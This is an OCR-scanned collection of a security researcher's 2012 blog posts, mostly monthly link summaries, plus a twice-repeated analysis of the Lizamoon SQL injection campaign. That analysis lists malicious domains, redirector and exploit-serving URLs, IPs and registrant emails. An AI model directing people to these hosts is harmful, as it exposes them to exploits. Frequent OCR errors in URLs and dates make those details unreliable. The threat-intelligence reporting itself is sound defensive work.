7. http://blog.webroot .com/2012/01/09/a-peek- inside-the-cythosia-v2-ddos-bot/ 
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ttp://blog. webroot .com/2012/01/09/google-announces-new-anti-malware-features-in-chrome/ 


. http://blog.webroot.com/2012/01/11/adobe-issues-a-patch-for-critical-security-holes-in-reader-and-acrobat 


ttp://blog.webroot .com/2012/01/13/inside-a-clickjackinglikejacking-scam-distribution-platform-for-face 


12. http://blog.webroot .com/2012/01/17/inside-anonjdb-a-java-based-malware-distribution-platforms-for-drive 


13, 
_netp:/ blog. vebroot.con/2032/01/23/hov~ phishers-launch-phishing-attacks/ 


16. http://blog. webroot .com/2012/01/25/researchers-intercept-a-client-side-exploits-serving-malware-campaig 


17. http: //blog.webroot.com/2012/01/26/a-peek-inside-the-ubot-malware-bot/ 


. http: //blog. webroot .com/2012/01/29/cisco-releases-cisco-global-threat-report-for-4q11/ 


. http: //blog. webroot. com/2012/01/30/cybercriminals-generate-malicious- java-applets-using-diy-tools/ 


20. http://ddanchev.blogspot.com/ 
21. http://twitter.com/danchodanche 
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8.3 March 


8.3.1 Summarizing ZDNet’s Zero Day Posts for February (2012-03-07 23:04) 
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The following is a brief summary of all of my posts at ZDNet’s Zero Day for February, 2012. 
You can subscribe to my [1]personal RSS feed , [2]Zero Day’s main feed , or follow me on 
Twitter: 


x 


01. [3]Spamvertised ’Tax information needed urgently’ emails lead to malware 
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02. [4]Researchers spot a fake version of Temple Run on Android’s Market 
03. [5]Which are the most commonly observed Web exploits in the wild? 
04. [6]Cryptome.org hacked, serving client-side exploits 


05. [7]Report: third party programs rather than Microsoft programs responsible for most 
vulnerabilities 


06. [8]Anonymous launches ‘Operation Global Blackout’, aims to DDoS the Root Internet 
servers 


07. [9]Report: malware pushed by affiliate networks remains the primary growth factor of the 
cybercrime ecosystem 


08.[10]Cutwail botnet resurrects, launches massive malware campaigns using HTML attach- 
ments 


09. [11]New Mac OS X trojan spotted in the wild 
10. [12]Spamvertised ’Scan from a HP OfficeJet’ emails lead to exploits and malware 


11. [13]XSS Flaw discovered in Skype’s Shop, user accounts targeted 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him 
[15]Jon Twitter. 


1. http: //www.zdnet .com/topics/danchot+danchev?o=1kmode=rss&tag=mantle_skin; content 


2. http: //feeds.feedburner .com/zdnet/securit 


ttp://www.zdnet .com/blog/security/cryptomeorg-hacked-serving-client-side-exploits/10319 


7. bttp://www.zdnet .com/blog/security/report-third-party-programs-rather-than-microsoft-programs-responsible 


for-most-vulnerabilities/1038 


8. http: //www.zdnet .com/blog/security/anonymous-launches-operation-global-blackout-aims-to-ddos-the-root-int 


ernet-servers/1038 


9. http://www.zdnet .com/blog/security/report-malware-pushed-by-affiliate-networks-remains-the-primary-growt 


factor-of-the-cybercrime-ecosystem/10392 


10. ttp://www.zdnet .com/blog/security/cutwail-botnet-resurrects-launches-massive-malware-campaigns-using- 


ml-attachments/10398 


11. http://www.zdnet.com/blog/security/new-mac-os-x-trojan-spotted-in-the-wild/10411 


12. http://www.zdnet .com/blog/security/spamvertised-scan-from-a-hp-officejet-emails-lead-to-exploits-and-ma 


lware/10414 


13. http://www.zdnet.com/blog/security/xss-flaw-discovered-in-skypes-shop-user-accounts-targeted/10418 


14. http: //ddanchev.blogspot.com/ 
15. http://twitter.com/danchodanche 
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8.3.2 Summarizing Webroot’s Threat Blog Posts for February (2012-03-07 23:18) 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for February, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Research: Google’s reCAPTCHA under fire 


02. [4]Spamvertised ‘You have 1 lost message on Facebook’ campaign leads to pharmaceuti- 
cal scams 
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03. [5]A peek inside the Smoke Malware Loader 

04. [6]Researchers spot Citadel, a ZeuS crimeware variant 

05. [7]Researchers intercept two client-side exploits serving malware campaigns 
06. [8]Pharmaceutical scammers launch their own Web contest 

07. [9]The United Nations hacked, Team Poison claims responsibility 

08. [10]Report: Internet Explorer 9 leads in socially-engineered malware protection 
09. [11]Twitter adds HTTPS support by default 

10. [12]Spamvertised “Hallmark ecard” campaign leads to malware 

11. [13]Report: 3,325 % increase in malware targeting the Android OS 

12. [14]Why relying on antivirus signatures is simply not enough anymore 

13. [15]Researchers intercept malvertising campaign using Yahoo’s ad network 

14. [16]A peek inside the Ann Malware Loader 

15. [17]Spamvertised ‘Termination of your CPA license’ campaign serving client-side exploits 
16. [18]How cybercriminals monetize malware-infected hosts 

17. [19]A peek inside the Elite Malware Loader 


18. [20]BlackHole exploit kits gets updated with new features 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]on Twitter. 


i cep ocegeenee co 
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. http: //blog. webroot .com/2012/02/10/pharmaceutical-scammers-launch-their-own-web-contest/ 
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11. 
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. http://blog.webroot .com/2012/02/17/report-3325- increase- in-malware-targeting-the-android-os/ 
. http://blog.webroot .com/2012/02/23/why-relying-on-antivirus-signatures-is-simply-not-enough-anymore/ 
. http://blog.webroot .com/2012/02/25/researchers-intercept-malvertising-campaign-using- yahoos-ad-network/ 
. http://blog.webroot .com/2012/02/25/a-peek-inside-the-ann-malware-loader/ 


http: //blog.webroot.com/2012/02/25/spamvertised-terminat ion-of-your-cpa-license-campaign-serving-client 


21. http://ddanchev.blogspot.com/ 
22. http://twitter .com/danchodanche 


8.4 April 


8.4.1 Summarizing ZDNet’s Zero Day Posts for March (2012-04-09 19:50) 
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The following is a brief summary of all of my posts at ZDNet’s Zero Day for March, 2012. You 
can subscribe to my [1]personal RSS feed , [2]Zero Day’s main feed , or follow me on Twitter: 
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01. [3]New Mac OS X malware variant spotted in the wild 


02. [4]Researchers intercept targeted malware attack against Tibetan organizations 


03. [5]Skype vouchers themed site serving client-side exploits and malware 


04. [6]Stratfor subscribers targeted by passwords-stealing malicious emails 


05. [7]Spoofed LinkedIn emails serving client-side exploits 
06. [8]Fake YouTube sites target Syrian activists with malware 


07. [9]New Mac OS X malware variant spotted in the wild 


08. [10]Spamvertised ’DHL Tracking Notification’ emails serve malware 


09. [11]Compromised WordPress sites serving client-side exploits and malware 


10. [12]’Pixmania.com payment order detail’ themed emails serving SpyEye crimeware 


11. [13]Fake ’Roar of the Pharaoh’ Android game spreads premium-rate SMS trojan 


12. [14]Research: Many mobile password managers offer false feeling of security 


13. [15]Targeted Pro-Tibetan malware attacks hit Mac OS X users 


14. [16]Opera for Mac OS X patches 6 security holes 


15. [17]Cybercriminals use Twitter, LinkedIn, Baidu, MSDN as command and control infrastruc- 
ture 


16. [18]Facebook phishing attack targets Syrian activists 


This post has been reproduced from [19]Dancho Danchev’s blog. Follow him 
[20]Jon Twitter. 
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8.4.2 Summarizing Webroot’s Threat Blog Posts for March (2012-04-09 20:03) 
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The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for March, 2012. 
You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]New service converts malware-infected hosts into anonymization proxies 
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02. [4]Spamvertised ‘Temporary Limit Access To Your Account’ emails lead to Citi phishing 
emails 


03. [5]A peek inside the Darkness (Optima) DDoS Bot 
04. [6]Research: proper screening could have prevented 67 % of abusive domain registrations 


05. [7]Spamvertised ‘Your accountant license can be revoked’ emails lead to client-side 
exploits and malware 


06. [8]Spamvertised ‘Google Pharmacy’ themed emails lead to pharmaceutical scams 
07. [9]Research: U.S accounts for 72 % of fraudulent pharmaceutical orders 
08. [1O]Millions of harvested U.S government and U.S military email addresses offered for sale 


09. [11]Spamvertised ‘Your tax return appeal is declined’ emails serving client-side exploits 
and malware 


10. [12]Malicious USPS-themed emails circulating in the wild 
11. [13]Spamvertised LinkedIn notifications serving client-side exploits and malware 
12. [14]Tens of thousands of web sites affected in ongoing mass SQL injection attack 


13. [15]Spamvertised Verizon-themed ‘Your Bill Is Now Available’ emails lead to ZeuS crime- 
ware 


14. [16]Spamvertised ‘Scan from a Hewlett-Packard ScanJet’ emails lead to client-side exploits 
and malware 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him 
[18]on Twitter. 


http://blog.webroot.com/ 
ttp://feeds2.feedburner .com/WebrootThreatBlog 


1. 
2. 
3. http: //blog.webroot .com/2012/03/02/new- service-converts-malware-infected-hosts-into-anonymization-proxies 


4. http://blog.webroot.com/2012/03/08/spamvertised-temporary-limit-access—to-your-account-emails-lead-to-cit 


i-phishing-emails/ 


5. http: //blog.webroot .com/2012/03/08/a-peek- inside-the-darkness-optima-ddos-bot/ 


6. http: //blog.webroot .com/2012/03/09/research-proper-screening-could-have-prevented-67-of-abusive-domain-re 


7. http://blog.webroot.com/2012/03/09/spamvertised-your-accountant-license-can-be-revoked-emails-lead-to-cli 


ent-side-exploits-and-malware/ 
3980 
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8.5 May 


8.5.1 Summarizing ZDNet’s Zero Day Posts for April (2012-05-08 19:20) 
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Dancho Dancher 
Bio i] Contact 
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The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for April, 2012. You 
can subscribe to my [2]personal RSS feed , [3]Zero Day’s main feed , or follow me on Twitter: 


01. [4]Researcher: 50 percent of Mac OS X users still running outdated Java versions 


02. [5]Malicious version of Angry Birds Space spotted in the wild 


03. [6]French gaming site serving ZeuS crimeware for over 8 weeks 


04. [7]New ransomware variants spotted in the wild 


05. [8]Nuclear Pack exploit kit introduces anti-honeyclient crawling feature 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him 
[10]Jon Twitter. 


1. http: //zdnet.com/blog/securit 


2. http://www. zdnet .com/topics/dancho+danchev?o0=1kmode=rss&tag=mantle_skin; content 


3. http://feeds. feedburner .com/zdnet/securit 


7. http: //www.zdnet .com/blog/security/new-ransomware-variants-spotted-in-the-wild/11532 


. bttp://www.zdnet .com/blog/security/nuclear-pack-exploit-kit-introduces-anti-honeyclient-crawling-feature/ 
11538 
9. http: //ddanchev. blogspot .com/ 

10. http: //twitter.com/danchodanche 
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8.5.2 Summarizing Webroot’s Threat Blog Posts for April (2012-05-08 19:31) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


; . Archives 
Managed SMS spamming services a 
going mainstream 
May 7, 2012 - 12:04 pm Free tools 
Www ww O 3 Votes Haven’t tried 


SecureAnyv B to 
By Dancho Danchev remove an infection? 


Are you receiving SMS spam? According to the latest reports, millions of mobile users do Download a free trial 


The trend is largely ng 3S an increase in underground market Webroot 


propositions ces to new market entrants not interested im building SecureAnywhere 

and maintaining the spamming i their own program/malware 
assistance? 

In thes post, I'll profile a recently advertised managed service offenng SMS spammmng capabilites to Open a support ticket 

potential customers, descus: uy s fi mpact to mobile secunty, and 


Concemed about a 
specific URL or IP? 
Check the reputation of 
@ URL or IP address 


More details: 


Read More » 

Tell your friends: Bi Facebook 21 Ej twiter 27 GE) Ding <3 Redcat G) stumbdieUpon [=] Email Connect with us! 
cee Cwitter 

Like thés: * Like 8e the first to like this pos 

By ddanchev | Posted in Mobile security, social enpireering, spam | Tags: cybercrime, Managed Services, Outrcercing, security, sms - =jlalalal’ 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for April, 2012. 
You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


Ol. 


02. 


03. 


04. 


05. 


06. 


07. 


x 


[3]Adobe patches critical security flaws, introduces auto-updating mechanism 
[4]Email hacking for hire going mainstream - part two 

[5]Spamvertised ‘US Airways’ themed emails serving client-side exploits and malware 
[6]New underground service offers access to hundreds of hacked PCs 

[7]Google’s Chrome patches 12 ‘high risk’ security vulnerabilities 

[8]Adobe plans to issue Acrobat Reader ‘security update’ next week 

[9]Microsoft issues 6 security bulletins on ‘Patch Tuesday’ 
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08. [10]Adobe patches critical Reader and Acrobat security vulnerabilities 


09. [11]Hewlett-Packard shipping malware-infected compact flash cards 
10. [12]New DIY email harvester released in the wild 


11. [13]Upcoming Webroot briefing at InfoSec, 2012, London - “Current and Emerging Trends 
Within the Cybercrime Ecosystem” 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him 
[15]Jon Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3. 


ttp://blog.webroot .com/2012/04/02/adobe-patches-critical-security-flaws-introduces-auto-updating-mechani 


11. http://blog. webroot. com/2012/04/14/hewlett-packard-shipping-malware-infected-compact-flash-cards/ 
12. http: //blog. webroot .com/2012/04/16/new-diy-email-harvester-released-in-the-wild/ 
13. http://blog.webroot .com/2012/04/23/upcoming-webroot-briefing-at-infosec-2012-london-current-and-emergi 
14 

15. 


8.5.3 Dissecting the Ongoing Client-Side Exploits Serving Lizamoon Mass SQL Injec- 
tion Attacks (2012-05-08 21:36) 


The [1]Lizamoon mass [2]SQL injection attacks gang is continuing to efficiently [3]inject 
malicious code on hundreds of thousands of legitimate sites, for the purpose of serving [4]fake 
security software - also known as scareware - and client-side exploits. 


The latest round of the campaign is serving client-side exploits through multiple redirec- 
tions taking place once the end user loads the malicious script embedded on legitimate sites. 
In comparison, in the past the gang used to monetize the hijacked traffic by serving scareware 
and bogus Adobe Flash Players. 


What are some of the currently SQL injected malicious domains? How does the redirec- 


tion take place? Did they take into consideration basic QA (quality assurance) tactics into 
place? Let’s find out. 
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hgbyju.com 


hnjhkm.com 


aA Net 31.210.100.0/24 AS. aS42926 


nikiju.com 4 G 31.210.100.242 
PTR : 
ee A 


werlontally.net 208.73.210.48 


njukol.com 


uhjiku.com 


Currrently injected malicious domains are parked at 31.210.100.242 (AS42926, RADORE 
Hosting), with the following domains currently responding to that IP: 

skdjui.com/r.php - Email: jamesnorthone@hotmailbox.com 

njukol.com/r.php - Email: jamesnorthone@hotmailbox.com 

hnjhkm.com/r.php - Email: jamesnorthone@hotmailbox.com 

nikjju.com/r.php - Email: jamesnorthone@hotmailbox.com 

hgbyju.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhjiku.com/r.php - Email: jamesnorthone@hotmailbox.com 

uhijku.com/r.php - Email: jamesnorthone@hotmailbox.com 

werlontally.net/rphp - Email: jamesnorthone@hotmailbox.com 


[5]March’s round of malicious domains was hosted at 91.226.78.148 (AS56697, LISIK-AS 
OOO “Byuro Remontov “FAST”). 


The redirection takes us to these two domains: www3.topcumaster.com - 75.102.21.120 
(AS23352, SERVERCENTRAL) 


Parked at 75.102.21.120 are also the following domains: 
www3.personal-scanera.com - Email: benji.rubes@yahoo.com 
www3.personalvoguard.com - Email: benji.rubes@yahoo.com 
www3.hard-zdsentinel.com - Email: benji.rubes@yahoo.com 
www3.bestbxcleaner.com - Email: benji.rubes@yahoo.com 
www3.topcumaster.com - Email: benji.rubes@yahoo.com 
www3.Safe-defensefu.com - Email: benji.rubes@yahoo.com 


and www1.safe-wnmasterit.cx - 217.23.8.123 (AS49981, WorldStream) 


Parked on 217.23.8.123 are also the following client-side exploits serving domains part 
of the Lizamoon mass SQL injection attacks: 

www1.thebestscannerdc.it.cx/i.html 

www1.safebh-defense.it.cx/i.html 

www1.strongdkdefense. it.cx/i.html 

www2.best-czsuite.it.cx/i.html 

www1.smartmasterf.it.cx/i.html 

www1.simplescanerei.it.cx/i.html 

www1.bestic-network.it.cx/i.html 
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www1.topqonetwork.it.cx/i.html 
www2.topasnetwork.it.cx/i.html 
www1.powerynetwork.it.cx/i.html 
www1.simplemasterzk.it.cx/i.html 
www1.powerneholder.it.cx/i.html 
www 1.personalkochecker.it.cx/i.html 
www1.smarthdschecker.it.cx/i.html 
www 1.safebacleaner.it.cx/i.html 
www 1.strongzkcleaner.it.cx/i.html 
www1.topumcleaner.it.cx/i.html 
www1.topgdscanner.it.cx/i.html 
www1.smartwoscanner.it.cx/i.html 
www1.safe-wnmaster.it.cx/i.html 
www1.powervmaster.it.cx/i.html 
www1.top-armyvs.it.cx/i.html 
wwwz2.saveocsoft.it.cx/i.html 

www 1.top-zjsoft.it.cx/i.html 
www1.powerdefensekt. it.cx/i.html 
www1.best-scanersw.it.cx/i.html 
www1.powermb-security.it.cx/i.html 
www 1.strongxd-security.it.cx/i.html 
www 1.strongbtsecurity.it.cx/i.html 


Client side exploits, [6JCVE-2010-0188 and [7]CVE-2012-0507 in particular are served 
through the i.html file located on these hosts. In order for the client-side exploitation process 
to take place, the redirection chain must be correct, if not the server will return a "404 Error 
Message" when requesting a specific file part of the campaign. There are no HTTP referrer 
checks in place, at least for the time being. What’s particularly interesting about the current 
Campaign, is that during a period of time, it will on purposely serve a "404 Error Message" no 
matter what happens. 


Updates will be posted, as soon as new developments emerge. 


Related posts: 


¢ [8]SQL Injection Through Search Engines Reconnaissance 

¢ [9]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
¢ [10]Massive SQL Injection Attacks - the Chinese Way 

¢ [11]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [12]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 

¢ [13]Dissecting the WordPress Blogs Compromise at Network Solutions 

e [14]Yet Another Massive SQL Injection Spotted in the Wild 

¢ [15]Smells Like a Copycat SQL Injection In the Wild 


¢ [16]Fast-Fluxing SQL Injection Attacks 
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¢ [17]Obfuscating Fast-fluxed SQL Injected Domains 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him [19]on 
Twitter. 


ttp://blog.webroot .com/2012/03/26/tens- of -thousands- of -web-sites-affected-in-ongoing-mass-sql-injection- 


ttp://ddanchev .blogspot.com/2009/04/massive-sql-injections-through- search. htm 
ttp://ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


ttp://ddanchev. blogspot .com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


12. http://ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs .htm 
13. http://ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise .htm 


ttp://ddanchev. blogspot .com/2008/05/yet-another-massive-sql-injection.htm 
ttp://ddanchev. blogspot .com/2008/07/smells-like-copycat-sql-injection-in.htm 


ttp://ddanchev. blogspot .com/2008/05/fast-fluxing-sql-injection-attacks.htm 


17. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 
18. http://ddanchev. blogspot .com/ 
19. http://twitter.com/danchodanche 


8.5.4 Dissecting the Ongoing Client-Side Exploits Serving Lizamoon Mass SQL Injec- 
tion Attacks (2012-05-08 21:36) 


The [1]Lizamoon mass [2]SQL injection attacks gang is continuing to efficiently [3]inject 
malicious code on hundreds of thousands of legitimate sites, for the purpose of serving [4]fake 
security software - also known as scareware - and client-side exploits. 


The latest round of the campaign is serving client-side exploits through multiple redirec- 
tions taking place once the end user loads the malicious script embedded on legitimate sites. 
In comparison, in the past the gang used to monetize the hijacked traffic by serving scareware 
and bogus Adobe Flash Players. 


What are some of the currently SQL injected malicious domains? How does the redirec- 
tion take place? Did they take into consideration basic QA (quality assurance) tactics into 
place? Let’s find out. 
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hgbyju.com 


hnjhkm.com 


aA Net 31.210.100.0/24 a 


nikjju.com 4 Cc 31.210.100.242 > 
- rE A 


werlontally.net 


AS42926 


208.73.210.48 


njukol.com 


uhjiku.com 


Currrently injected malicious domains are parked at 31.210.100.242 (AS42926, RADORE 
Hosting), with the following domains currently responding to that IP: 


skdjui.com/r.php - Email: jamesnorthone@hotmailbox.com 
njukol.com/r.php - Email: jamesnorthone@hotmailbox.com 
hnjhkm.com/r.php - Email: jamesnorthone@hotmailbox.com 
nikjju.com/r.php - Email: jamesnorthone@hotmailbox.com 
hgbyju.com/r.php - Email: jamesnorthone@hotmailbox.com 
uhjiku.com/r.php - Email: jamesnorthone@hotmailbox.com 
uhijku.com/r.php - Email: jamesnorthone@hotmailbox.com 


werlontally.net/r.php - Email: jamesnorthone@hotmailbox.com 


[5]March’s round of malicious domains was hosted at 91.226.78.148 (AS56697, LISIK-AS 
OOO “Byuro Remontov “FAST”). 


The redirection takes us to these two domains: www3.topcumaster.com - 75.102.21.120 
(AS23352, SERVERCENTRAL) 
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Parked at 75.102.21.120 are also the following domains: 
www3.personal-scanera.com - Email: benji.rubes@yahoo.com 
www3.personalvoguard.com - Email: benji.rubes@yahoo.com 
www3.hard-zdsentinel.com - Email: benji.rubes@yahoo.com 
www3.bestbxcleaner.com - Email: benji.rubes@yahoo.com 
www3.topcumaster.com - Email: benji.rubes@yahoo.com 


www3.Safe-defensefu.com - Email: benji.rubes@yahoo.com 


and www1.safe-wnmasterit.cx - 217.23.8.123 (AS49981, WorldStream) 


Parked on 217.23.8.123 are also the following client-side exploits serving domains part 
of the Lizamoon mass SQL injection attacks: 


www1,.thebestscannerdc.it.cx/i.html 
www1.safebh-defense.it.cx/i.html 
www1.strongdkdefense. it.cx/i.html 
www2.best-czsuite.it.cx/i.html 
www1.smartmasterf.it.cx/i.html 
www1.simplescanerei.it.cx/i.html 
www1.bestic-network. it.cx/i.html 
www 1.topqonetwork.it.cx/i.html 
www2.topasnetwork.it.cx/i.html 
www1.powerynetwork.it.cx/i.html 
www1.simplemasterzk.it.cx/i.html 
www1.powerneholder.it.cx/i.html 


www 1.personalkochecker.it.cx/i.html 
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www1.smarthdschecker.it.cx/i.html 
www 1.safebacleaner.it.cx/i.html 
www 1.strongzkcleaner.it.cx/i.html 
www1,.topumcleaner.it.cx/i.html 
www1.topgdscanner.it.cx/i.html 
www1.smartwoscanner.it.cx/i.html 
www 1.safe-wnmaster.it.cx/i.html 
www1.powervmaster.it.cx/i.html 
www1.top-armyvs.it.cx/i.html 
wwwz2.saveocsoft.it.cx/i.html 

www 1.top-zjsoft.it.cx/i.html 
www1.powerdefensekt. it.cx/i.html 
www 1.best-scanersw.it.cx/i.html 
www1.powermb-security.it.cx/i.html 
www 1.strongxd-security.it.cx/i.html 


www 1.strongbtsecurity. it.cx/i.html 


Client side exploits, [6]CVE-2010-0188 and [7]CVE-2012-0507 in particular are served 
through the i.html file located on these hosts. In order for the client-side exploitation process 
to take place, the redirection chain must be correct, if not the server will return a "404 Error 
Message" when requesting a specific file part of the campaign. There are no HTTP referrer 
checks in place, at least for the time being. What’s particularly interesting about the current 
Campaign, is that during a period of time, it will on purposely serve a "404 Error Message" no 
matter what happens. 


Updates will be posted, as soon as new developments emerge. 


Related posts: 
3990 


[8]SQL Injection Through Search Engines Reconnaissance 

[9]Massive SQL Injections Through Search Engine’s Reconnaissance - Part Two 
[10]Massive SQL Injection Attacks - the Chinese Way 

[11]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 
[12]GoDaddy’s Mass WordPress Blogs Compromise Serving Scareware 
[13]Dissecting the WordPress Blogs Compromise at Network Solutions 

[14]Yet Another Massive SQL Injection Spotted in the Wild 

[15]Smells Like a Copycat SQL Injection In the Wild 

[16]Fast-Fluxing SQL Injection Attacks 


[17]Obfuscating Fast-fluxed SQL Injected Domains 


ttp://blog.webroot .com/2012/03/26/tens- of -thousands- of -web-sites-affected-in-ongoing-mass-sql-injection- 


ttp://ddanchev.blogspot.com/2009/04/massive-sql-injections-through- search. htm 
ttp://ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 


ttp://ddanchev. blogspot .com/2010/07/cybercriminals-sql-inject-cybercrime.htm 


12. http://ddanchev. blogspot .com/2010/04/godaddys-mass-wordpress-blogs .htm 
13. http://ddanchev. blogspot .com/2010/04/dissecting-wordpress-blogs- compromise .htm 


ttp://ddanchev. blogspot .com/2008/05/yet-another-massive-sql-injection.htm 
ttp://ddanchev. blogspot .com/2008/07/smells-like-copycat-sql-injection-in.htm 


ttp://ddanchev. blogspot .com/2008/05/fast-fluxing-sql-injection-attacks.htm 


17. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 
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8.6 June 


8.6.1 Summarizing ZDNet’s Zero Day Posts for May (2012-06-06 18:15) 


ZNet 


ao = Eliminate system downtime. 


se internet Security 
al " = 
: nie " 


Zero Day apg Tech Blueprint 


Vatuable cybersecurty tips & tools from IT 
Home / News & Biogs securty pros. Watch Now 


ZDNet Must Read 
- ac ae t ge nerated bee 000 a my rol Flashback ge ang 


soogte of 4 ang dollars by redirecting chicks from fected Mac OS x 
me ad revenue 


Facebook begins notifying DNSChanger victims How to select the 


a 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for May, 2012. You 
can subscribe to my [2]personal RSS feed , [3]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [4]ls Mozilla’s Firefox ’click-to-play’ feature a sound response to drive-by malware attacks? 
02. [5]Rogue Firefox extension hijacks browser sessions 
03. [6]Spamvertised ’PayPal payment notifications’ lead to client-side exploits and malware 


04. [7]lsraeli Institute for National Security Studies compromised, serving Poison Ivy DIY 
malware 


05. [8]Researchers spot new Web malware exploitation kit 

06. [9]2012 Olympics themed malware circulating in the wild 

07. [10]New ransomware impersonates the U.S Department of Justice 
08. [11]Localized ransomware variants circulating in the wild 
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09. [12]Cybercriminals offer bogus fraud insurance services 
10. [13]Researchers spot fake mobile antivirus scanners on Google Play 
11. [14]The cyber security implications of Iran’s government-backed antivirus software 


12. [15]Q &A of the week: ’The current state of the cyber warfare threat’ featuring Jeffrey Carr 


13. [16]Researchers intercept Tatanga malware bypassing SMS based transaction authoriza- 
tion 


14. [17]New SpyEye plugin takes control of crimeware victims’ webcam and microphone 
15. [18]Comcast phishing site contains valid TRUSTe seal 


16. [19]Q SA of the Week: ’The current state of the cybercrime ecosystem’ featuring Mikko 
Hypponen 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 


1. http://zdnet .com/blog/securit 


2. http: //www.zdnet .com/topics/dancho+danchev?o0=1&mode=rss&tag=mantle_skin; content 


3. http://feeds.feedburner.com/zdnet/securit 


4. http://www.zdnet.com/blog/security/is-mozillas-firefox-click-to-play-feature-a-sound-response-to-drive-b 


malware-attacks/1182 


5. http: //www.zdnet.com/blog/security/rogue-firefox-extension-hijacks-browser-sessions/11856 


ttp://www.zdnet.com/blog/security/spamvertised-paypal-payment-notifications-lead-to-client-side-exploits 
and-malware/11866 


7. bttp://www.zdnet.com/blog/security/israeli-institute-for-national-security-studies-compromised-serving-po 
8. http: //www.zdnet .com/blog/security/researchers-spot-new-web-malware-exploitation-kit/1192 

9. http: //www.zdnet.com/blog/security/2012-olympics-themed-malware-circulating-in-the-wild/11944 

10. http://www.zdnet .com/blog/security/new-ransomware- impersonates-the-us-department-of-justice/1195 

11. http://www.zdnet .com/blog/security/localized-ransomware-variants-circulating-in-the-wild/12018 

12. http://www.zdnet .com/blog/security/cybercriminals-offer-bogus-fraud-insurance-services/1202 


13. http://www.zdnet .com/blog/security/researchers-spot-fake-mobile-antivirus-scanners-on-google-play/12040 


14. bttp://www.zdnet.com/blog/security/the-cyber-security-implications-of-irans-government-backed-antivirus 


software/1204 


15. bttp://www.zdnet.com/blog/security/q-a-of-the-week-the-current-state-of-the-cyber-warfare-threat-featu 


ing- jeffrey-carr/12066 


16. bttp://www.zdnet .com/blog/security/researchers-intercept-tatanga-malware-bypassing-sms-based-transactio 


-authorization/12280 


17. bttp://www.zdnet.com/blog/security/new-spyeye-plugin-takes-control-of-crimeware-victims-webcam-and-mic 


ophone/12286 


18. http://www.zdnet .com/blog/security/comcast-phishing-site-contains-valid-truste-seal/12292 


19. http://www.zdnet.com/blog/security/q-a-of-the-week-the-current-state-of-the-cybercrime-ecosystem-featu 
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ing-mikko-hypponen/1214 
20. http: //ddanchev.blogspot.com/ 
21. http://twitter.com/danchodanche 


8.6.2 Summarizing Webroot’s Threat Blog Posts for May (2012-06-06 18:31) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


A peek inside a boutique cybercrime- (sai nak —Ta 
friendly E-shop - part three 
weit © 2 votes” sagiedegs yell 


Free security for your 
friends AND a donation 
to charity 


By Dancho Danchev 


Over the past few months, I've been witnessing an increase in underground market propositions 
what apr to be novice cybercriminals. The trend, largely driven by the increasir 

ervice underground market propositions, results in an increasing number of 
@- friendly E-shops attempting to monetize fraudulently obtained a inting 


Free tools 
Haven't tned Webroot 
ecureAnywhwere tc 


remove an infection? 
Download a free trial 


ss star e? 
Open a support ticket 


omcermed about a 

peciic URL or IP? 
Check the reputation of 
@ URL or IP address 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for May, 2012. 
You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


01. [3]London’s InfoSec 2012 Event - recap 
02. [4]Managed SMS spamming services going mainstream 
03. [5]A peek inside a boutique cybercrime-friendly E-shop 


04. [6]Cybercriminals release ‘Sweet Orange’ - new web malware exploitation kit 
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05. [7]Spamvertised ‘Pizzeria Order Details’ themed campaign serving client-side exploits 
and malware 


06. [8]Poison Ivy trojan spreading across Skype 
07. [9]A peek inside a managed spam service 


08. [10]Ongoing ‘LinkedIn Invitation’ themed campaign serving client-side exploits and 
malware 


09. [11]Spamvertised bogus online casino themed emails serving adware 


10. [12]Spamvertised ‘YouTube Video Approved’ and ‘Twitter Support” themed emails lead to 
pharmaceutical scams 


11. [13]A peek inside a boutique cybercrime-friendly E-shop - part two 
12. [14]Spamvertised CareerBuilder themed emails serving client-side exploits and malware 
13. [15]Pop-ups at popular torrent trackers serving W32/Casonline adware 


14.[16]‘Windstream bill’ themed emails serving client-side exploits and malware 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him 
[18]on Twitter. 


. http://blog.webroot.com/ 
. http: //feeds2.feedburner.com/WebrootThreatBlog 
. http: //blog. webroot .com/2012/05/03/londons- inf osec-2012-event-recap/ 


ttp://blog. webroot .com/2012/05/07/managed- sms-spamming- services-going-mainstream/ 


ttp://blog. webroot .com/2012/05/08/a-peek-inside-a-boutique-cybercrime-friendly-e-shop/ 


ttp://blog.webroot.com/2012/05/10/cybercriminals-release-sweet- orange-new-web-malware-exploitation-kit/ 


NOURWNE 


